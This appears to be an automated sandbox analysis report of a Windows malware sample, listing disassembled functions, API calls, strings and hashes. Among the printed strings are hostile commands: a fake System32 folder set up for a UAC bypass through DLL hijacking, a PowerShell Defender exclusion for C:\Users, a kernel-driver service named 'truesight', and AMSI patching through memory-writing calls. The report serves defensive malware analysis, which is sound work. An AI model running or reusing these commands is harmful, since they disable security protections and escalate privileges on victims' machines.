String ID: C : \Win do ws \ Sys tem 32\KD EC O.b at$C :\W ind ow s \Sys tem 32 \NETU TI LS.d ll$C :\W indo ws \S yst em 32\ eas invo ker.e xe$C:\Windows \System32\KDECO.bat$C:\Windows\System32\$C:\\Windows \\System32\\easinvoker.exe$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$s.d$start /min cmd /c mkdir "\\?\C:\Windows " &mkdir "\\?\C:\Windows \System32" &ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "KDECO.bat" "C:\Windows \$start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &sc.exe start truesight $x.bat
API String ID: 2820154672-430201296
Opcode ID: 19411da5c51345ff451c4bb0352154127d42eb9e04e7fffa396234d25f749e8f
Instruction ID: a3ed6ccd5ecf4ddd76a703c2ae7f1a050bbe45907f2c6bd251b394f2db39d766
Opcode Fuzzy Hash: 19411da5c51345ff451c4bb0352154127d42eb9e04e7fffa396234d25f749e8f
Instruction Fuzzy Hash: C3131C39B10519CBEB14EBA5DDC1BEEB3B5EF88208F1045E2D109A7654DB70BE868F44

Uniqueness

Uniqueness Score: -1.00%

Function 04227420 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,04227598), ref: 04227441
GlobalAddAtomA.KERNEL32(00000000), ref: 04227474
GetCurrentThreadId.KERNEL32 ref: 0422748F
GlobalAddAtomA.KERNEL32(00000000), ref: 042274C5
RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04227598), ref: 042274DB

Part of subcall function 041F7B44: InitializeCriticalSection.KERNEL32(List,?,?,042274F1,00000000,00000000,?,?,00000000,04227598), ref: 041F7B63

Part of subcall function 04227028: SetErrorMode.KERNEL32(00008000), ref: 04227041
Part of subcall function 04227028: GetModuleHandleA.KERNEL32(USER32,00000000,0422718E,?,00008000), ref: 04227065
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04227072
Part of subcall function 04227028: LoadLibraryA.KERNEL32(imm32.dll,00000000,0422718E,?,00008000), ref: 0422708E
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 042270B0
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 042270C5
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 042270DA
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 042270EF
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04227104
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04227119
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0422712E
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04227143
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04227158
Part of subcall function 04227028: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0422716D
Part of subcall function 04227028: SetErrorMode.KERNEL32(?,04227195,00008000), ref: 04227188

Part of subcall function 04231538: GetKeyboardLayout.USER32(00000000), ref: 0423157D
Part of subcall function 04231538: GetDC.USER32(00000000), ref: 042315D2
Part of subcall function 04231538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 042315DC
Part of subcall function 04231538: ReleaseDC.USER32(00000000,00000000), ref: 042315E7

Part of subcall function 04232740: LoadIconA.USER32(00000000,MAINICON), ref: 04232837
Part of subcall function 04232740: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 04232869
Part of subcall function 04232740: OemToCharA.USER32(?,?), ref: 0423287C
Part of subcall function 04232740: CharNextA.USER32(?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328BB
Part of subcall function 04232740: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04227598), ref: 0422755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04227570

Strings

Delphi%.8X, xrefs: 04227452
USER32, xrefs: 0422755A
AnimateWindow, xrefs: 0422756A
ControlOfs%.8X%.8X, xrefs: 042274A3

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1515865724-1126952177
Opcode ID: a6c81a6295389ba272fbc3337103c80758d4b1bf12f6109c91052fccda748443
Instruction ID: 8eab940e80ad6907fca7ac60ba8aee5762021cab39f50f6d567a97d0562fc3c2
Opcode Fuzzy Hash: a6c81a6295389ba272fbc3337103c80758d4b1bf12f6109c91052fccda748443
Instruction Fuzzy Hash: 88416AB8B146059FEB00FFA9E9C49AEB7F9EB59318B404565E404E7310DB39BD018F54

Uniqueness

Uniqueness Score: -1.00%

Function 0423BCF8 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 400
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,0436EBB8,0436EBFC,ScanString,0427A350,0423C330,OpenSession,0427A350), ref: 0423C05F
WaitForSingleObject.KERNEL32(0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,UacScan,0427A350), ref: 0423C2AB
CloseHandle.KERNEL32(0000089C,0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,UacScan), ref: 0423C2B6
CloseHandle.KERNEL32(000008A0,0000089C,0000089C,000000FF,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330,ScanString,0427A350,0423C330,OpenSession,0427A350,0423C330), ref: 0423C2C1

Strings

*"C:\Users\Public\Libraries\FinqiaevO.bat" , xrefs: 0423BE69, 0423C029
AmsiOpenSession, xrefs: 0423BE8C
OpenSession, xrefs: 0423BD8A, 0423BF2E, 0423C0DC, 0423C1C8
UacScan, xrefs: 0423BD31, 0423BED5, 0423C06B
ScanString, xrefs: 0423BDE3, 0423BF87, 0423C14D, 0423C239
Amsi, xrefs: 0423BE9D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: HandleProcess$CloseCurrentLibraryMemoryVirtual$AddressCreateFreeLoadModuleObjectProcProtectSingleUserWaitWrite
String ID: *"C:\Users\Public\Libraries\FinqiaevO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
API String ID: 2776809114-751107746
Opcode ID: 220addad9f38dbf6624793eb5a80ce2db1afbd8a98e5884ac2355115ab70c5f5
Instruction ID: e065ea1186976fb998fff41c69340d873b356fa15a08546d663b56aea27b53be
Opcode Fuzzy Hash: 220addad9f38dbf6624793eb5a80ce2db1afbd8a98e5884ac2355115ab70c5f5
Instruction Fuzzy Hash: 6BF10E39B10519DBEB10EBA6DCC1BEEB3B9AF88209F108161E144BB254DB30FD468F55

Uniqueness

Uniqueness Score: -1.00%

Function 04232740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00000000,MAINICON), ref: 04232837
GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 04232869
OemToCharA.USER32(?,?), ref: 0423287C
CharNextA.USER32(?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328BB
CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,04227530,00000000,00000000,?,?,00000000,04227598), ref: 042328C1

Part of subcall function 04232A94: GetClassInfoA.USER32(041E0000,04232730,?), ref: 04232AF3
Part of subcall function 04232A94: RegisterClassA.USER32(0424B650), ref: 04232B0B
Part of subcall function 04232A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04232BA7
Part of subcall function 04232A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04232BC9

Strings

MAINICON, xrefs: 0423282A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: 7cffb1620daed879af13ccd02f525646651f349079f3b7e7cbcc828f78c80f37
Instruction ID: 6328953d6ee2b87de417ee1946bfb3627b8c8a9a6cacdf854411ff5baf44a20a
Opcode Fuzzy Hash: 7cffb1620daed879af13ccd02f525646651f349079f3b7e7cbcc828f78c80f37
Instruction Fuzzy Hash: A2516BB0B042459FEB40EF29D8C4B957BE4AB15308F4840F4DC48CF346DBBAA9898B61

Uniqueness

Uniqueness Score: -1.00%

Function 041E17C0 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,041E209C), ref: 041E186C
Sleep.KERNEL32(0000000A,00000000,?,041E209C), ref: 041E1882

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 31058e86cbe1e9d6efe31e6f4cea579929d7e154ea049e8207fbd60db665d6bd
Instruction ID: c725b123b862e9a305d31651298bac6341e95190e81a0e6d5fb846fbe79e0a8e
Opcode Fuzzy Hash: 31058e86cbe1e9d6efe31e6f4cea579929d7e154ea049e8207fbd60db665d6bd
Instruction Fuzzy Hash: 21B1017A600A11ABD715CF2EE8C4376BBE1EBC5321F1982EED4598B384D774B881C791

Uniqueness

Uniqueness Score: -1.00%

Function 041E1B28 Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,041E2080), ref: 041E1BB3
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,041E2080), ref: 041E1BCD

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 79a1ba83119dd0593e15940a85c5e55a397a0f215c9eab3a050dc47dde51e8a2
Instruction ID: 7addbbafd202c1e8cb49fec1479fbe0405a50ed0a156c18001061b52fbbc4622
Opcode Fuzzy Hash: 79a1ba83119dd0593e15940a85c5e55a397a0f215c9eab3a050dc47dde51e8a2
Instruction Fuzzy Hash: A451B079700B00AEE7158F6AD9C4776BBE0EF85324F1885EED444CB281E774E984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0420765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 04207682

Part of subcall function 04207618: GetDC.USER32(00000000), ref: 04207621
Part of subcall function 04207618: SelectObject.GDI32(00000000,058A00B4), ref: 04207633
Part of subcall function 04207618: GetTextMetricsA.GDI32(00000000), ref: 0420763E
Part of subcall function 04207618: ReleaseDC.USER32(00000000,00000000), ref: 0420764F

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 042076D8
Tahoma, xrefs: 042076A4
MS Shell Dlg 2, xrefs: 042076EC

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 2013942131-1011973972
Opcode ID: ad444ebb7d3d742396050677d3a216aff4d2fec93202958897f0323ba5896964
Instruction ID: 74813a3316e1d981212a6d6a4ec6e394261f4843ef3c6a83b63f55e081fd60bf
Opcode Fuzzy Hash: ad444ebb7d3d742396050677d3a216aff4d2fec93202958897f0323ba5896964
Instruction Fuzzy Hash: 8F11E330760608AFFB01EF68E881A6D7BE5EB86604F90C4A4E400976E2CB35BD01CB10

Uniqueness

Uniqueness Score: -1.00%

Function 041FEA38 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(041E0000,041FEA28,?), ref: 041FEA59
UnregisterClassA.USER32(041FEA28,041E0000), ref: 041FEA82
RegisterClassA.USER32(0424AAF8), ref: 041FEA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 041FEAD7

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 5ce742ff15e4022ce8b46e612d2f0652973a22097a518db903e6d7256f3fd09f
Instruction ID: ef43239d963cfb39403d0f54cbaa327da2ed2b345cd5d24723daeade368df037
Opcode Fuzzy Hash: 5ce742ff15e4022ce8b46e612d2f0652973a22097a518db903e6d7256f3fd09f
Instruction Fuzzy Hash: AD015BB97402016BFB11EB9CECC4FAA37A9F759308F104150BA15F72D1D735AD828760

Uniqueness

Uniqueness Score: -1.00%

Function 04200308 Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 04200374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,042004A2), ref: 042003DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04200444

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 163dec2600431a030be702771b8272ad05ba025b4c35e06113b1fcdc30f4644b
Instruction ID: e7c988fb72a53f3c39028004ecbd3bff3069394f368b0ba60fece881412ce95c
Opcode Fuzzy Hash: 163dec2600431a030be702771b8272ad05ba025b4c35e06113b1fcdc30f4644b
Instruction Fuzzy Hash: 6C41A434B00709AFFB11EBA1D981B9EB7F9AF04308F108469E844A3692DB74BF059B44

Uniqueness

Uniqueness Score: -1.00%

Function 041F9CA0 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9CFC
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9D2A

Part of subcall function 041E8CE0: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,041F5B68,041F9D6A,00000000,041F9DE8,?,?,041F5B68), ref: 041E8D2E

Part of subcall function 041E8F1C: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,041F5B68,041F9D85,00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041E8F3B

GetLastError.KERNEL32(00000000,041F9DE8,?,?,041F5B68,00000001), ref: 041F9D8F

Part of subcall function 041EB878: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,041ED5E5,00000000,041ED63F), ref: 041EB897

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: dac0f085123dcd30f51330ea3151b60fe5e00ab8207a6b9aa187794634467657
Instruction ID: 45c2d83d03abcd3aeb8c173277c96d69b6f3f3b8da75ba7b13ae76cf29ad45a3
Opcode Fuzzy Hash: dac0f085123dcd30f51330ea3151b60fe5e00ab8207a6b9aa187794634467657
Instruction Fuzzy Hash: FF316574A04A589FEB00EFA6CCC0BEEB7F5AF49708F508165E504A7380D7797D058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0423C788 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0436ED0C), ref: 0423C7CC
RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,0423C837), ref: 0423C804
RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,0423C837), ref: 0423C80F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 59484884f62abd892dcd320ce58ae65409c94375061bbfe4f8085bdc8756a1c4
Instruction ID: 990807a7d412d2a63731b29ef12e49f5a398e05c6624959ee491eba58bfbc8a5
Opcode Fuzzy Hash: 59484884f62abd892dcd320ce58ae65409c94375061bbfe4f8085bdc8756a1c4
Instruction Fuzzy Hash: 69110D79600608AFEB00EFAADDC19AD7BFCEB48744F508561F404D7250D774FE019A54

Uniqueness

Uniqueness Score: -1.00%

Function 041EF6D0 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 041EF6DF

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 68ada7704a887b4c6d6d930544c97257d3ced3f770cdb821634e2eaacacd14b0
Instruction ID: 9cf27b660b68643df5f08500bb1cff5ba40df4f76798c1c50968b7aaa95d2124
Opcode Fuzzy Hash: 68ada7704a887b4c6d6d930544c97257d3ced3f770cdb821634e2eaacacd14b0
Instruction Fuzzy Hash: F5F0C26CF00A10B6B7156B3B9DC45BA23999F04608B9144B5EC469B211DB35FC4BD362

Uniqueness

Uniqueness Score: -1.00%

Function 041E5058 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(0423C89C), ref: 041E4F76
SysAllocStringLen.OLEAUT32(?,?), ref: 041E5063
SysFreeString.OLEAUT32(00000000), ref: 041E5075

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
Instruction ID: 1fc93f8af5d3672bb5fbf24d6030ab28ddeeec79faf02fa8fa2419cb62b6571c
Opcode Fuzzy Hash: df0ebbd49c3a427229fcfe081cf9a0000e2a8653e023cf59d4f9583f6407e03e
Instruction Fuzzy Hash: 93E012BC505A026DFF156F6B8CC0F3B336DAFC5A00FA544D8A400DA165DB38F491A624

Uniqueness

Uniqueness Score: -1.00%

Function 041FF2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 041FF5A6

Strings

H, xrefs: 041FF35D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: f05e8a5f2ac49b25a62a6eb3482c3f99b3f7aa1f0e4a6a23aa40a97fc0a47d7a
Instruction ID: 84e8ec5c965006cc14f5d562a7659c3f0b8f03ffda345aeef83ce75f5a1e1d93
Opcode Fuzzy Hash: f05e8a5f2ac49b25a62a6eb3482c3f99b3f7aa1f0e4a6a23aa40a97fc0a47d7a
Instruction Fuzzy Hash: 18B1C274A01608DFDB14CF99D8C0AADBBF2FF89314F1581AAE905AB360D770A846CF54

Uniqueness

Uniqueness Score: -1.00%

Function 042004BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04200524), ref: 042004F2

Strings

MS Shell Dlg 2, xrefs: 042004C3

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
Instruction ID: 3ba12ffaeb62d92bed498ea567da6ff83c4b9046a3877d9412bf5054592154b7
Opcode Fuzzy Hash: db5121f2734763979ec4ff47aa658ec7e1099c7c02836b1da46307653a404667
